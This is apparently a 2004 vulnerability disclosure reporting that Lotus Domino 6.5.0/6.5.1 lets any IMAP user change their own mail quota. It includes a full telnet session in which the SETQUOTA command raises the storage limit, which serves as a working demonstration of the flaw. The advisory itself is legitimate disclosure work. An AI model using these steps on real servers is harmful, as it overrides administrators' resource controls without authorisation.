Lotus Domino 6.5.0/6.5.1 has a flaw that allows every user the ability to change their quota on an imap-enabled Domino Server to any value.
this problem has been reported to IBM Lotus customer support on
January 19,2004.
Affected versions:
Domino 6.5.0/6.5.1 (other versionns not tested by me)
Every user can change his quota on an imap-enabled Domino server to every
value he likes.
Detailed description:
If your mailfile is imap-enabled and you have access to an imap-enabled
Domino-server you can change your quota to arbitrary values.
To do this make a telnet conntection to the imap-server and use the
setquota command to change the quota. If the server only accepts imaps
connections you can use stunnel or openssl s_client.
Here is an example for an unencrypted session:
# telnet imap 143
Trying ip-address
Connected to imap.
Escape character is '^]'.
* OK Domino IMAP4 Server Release 6.5 ready Mon, 19 Jan 2004 01:40:03 +0100
1 capability
1 OK CAPABILITY completed
2 login user password
2 OK LOGIN completed
3 getquota
* QUOTA "" (STORAGE 45548 10240)
3 OK GETQUOTA completed
4 setquota "" (storage 50000)
* QUOTA "" (STORAGE 45548 50000)
4 OK SETQUOTA completed
5 getquota
* QUOTA "" (STORAGE 45548 50000)
5 OK GETQUOTA completed
6 logout
No solution is provided by IBM by now. You can watch the proceeding by
watching for SPR# SEGN5VEFHE. This will not be fixed in the R6 codestream.
R7 will probably contain the fix.